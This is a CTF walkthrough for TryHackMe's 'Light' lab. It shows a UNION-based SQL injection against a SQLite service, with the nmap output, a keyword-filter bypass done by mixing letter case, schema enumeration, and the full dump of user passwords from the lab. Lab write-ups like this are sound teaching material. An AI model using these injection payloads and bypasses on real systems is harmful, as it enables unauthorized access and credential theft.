Introduction

Detailed walkthroughs for Light CTF challenges on TryHackMe .

Description

I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc 10.10.95.233 1337 You can use the username smokey in order to get started.

Enumaration

sudo echo 10.10.95.233 light.thm >> /etc/hosts

Mapped the ip to domain light.thm.

NetCat

We receive the password when a valid username is entered.

$ nc light.thm 1337 
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: Mike
Username not found.

nmap

Let’s scan for other open ports on this IP.

$ nmap light.thm -sV -sC -p-          
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 61:c5:06:f2:4a:20:5b:cd:09:4d:72:b0:a5:aa:ce:71 (RSA)
|   256 51:e0:5f:fa:81:64:d3:d9:26:24:16:ca:45:94:c2:00 (ECDSA)
|_  256 77:e1:36:3b:95:9d:e0:3e:0a:56:82:b2:9d:4c:fe:1a (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Welcome to the Light database!
|     Please enter your username:
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest: 
|     Welcome to the Light database!
|     Please enter your username: Username not found.
|_    Please enter your username:
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We’re unable to access the shell via SSH using Smokey’s password. Let’s attempt to analyze the behavior of the database (1337) instead.

Response analysis

Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
Please enter your username: '--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 'error  
Error: near "error": syntax error
Please enter your username: error'        
Error: unrecognized token: "'error'' LIMIT 30"
Please enter your username: 'union
Ahh there is a word in there I don't like :(

By providing different inputs, we encountered a database error. Based on the inputs and responses above, the SQL query being used appears to be:

select password from users where username='input' LIMIT 30

Bypassing detection

Let’s attempt to use some SQL keywords here.

Please enter your username: select
Ahh there is a word in there I don't like :(
Please enter your username: union
Ahh there is a word in there I don't like :(

It detects the strings select and union and responds with, Ahh, there's a word in there I don't like :(. Let’s attempt to bypass this. By changing the case of the word, I was able to bypass it.

Please enter your username: Union
Username not found.
Please enter your username: Select
Username not found.

By using a mix of uppercase and lowercase in keywords like SELECT and UNION, we can bypass detection.

Detection DBMS

Let’s attempt a union-based attack.

Please enter your username: 'Union Select true'
Password: 1
Please enter your username: 'Union Select false'
Password: 0

We can execute union attacks successfully. Now, let’s try to retrieve the database version. Reference: link1 , link2

Please enter your username: 'Union Select @@version'
Error: unrecognized token: "@"
Please enter your username: 'Union Select %40%40version'
Error: near "%": syntax error
Please enter your username: 'Union Select version()'
Error: no such function: version
Please enter your username: 'Union Select v$version'
Error: no such column: v$version
Please enter your username: 'Union Select banner FROM v$version'
Error: no such table: v$version
Please enter your username: 'Union Select version FROM v$instance'
Error: no such table: v$instance
Please enter your username: 'Union Select sqlite_version()'
Password: 3.31.1

We have received the result indicating that an SQLite database is being used.

Dumping DBMS Structure

Let’s use SQLite database keywords and attempt to dump the data. Reference

Please enter your username: 'Union Select sql From sqlite_master'
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
Please enter your username: SELECT    
Ahh there is a word in there I don't like :(
Please enter your username: 'Union sELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%''
Password: usertable,admintable

We have obtained the table names here.

Please enter your username: 'Union sELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('usertable')'
Password: id,username,password
Please enter your username: 'Union sELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('admintable')'      
Password: id,username,password

We have retrieved the column names here.

Dumping all data

Please enter your username: 'Union Select GROUP_CONCAT(username) from usertable'
Password: alice,rob,john,michael,smokey,hazel,ralph,steve                                    
Please enter your username: 'Union Select GROUP_CONCAT(password) from usertable'             
Password: tF8tj2o94WE4LKC,yAn4fPaF2qpCKpR,e74tqwRh2oApPo6,7DV4dwA0g5FacRe,vYQ5ngPpw8AdUmL,EcSuU35WlVipjXG,YO1U9O1m52aJImA,WObjufHX1foR8d7                                         

We have extracted the data from the “usertable.”

Please enter your username: 'Union Select GROUP_CONCAT(username) from admintable'            
Password: T**********n,flag                                                                
Please enter your username: 'Union Select GROUP_CONCAT(password) from admintable'
Password: mam***************q17,THM{S********************nO?}
Please enter your username: 

We have extracted the data from the admintable, and this marks the end of the CTF.

Happy Hacking !!! 😎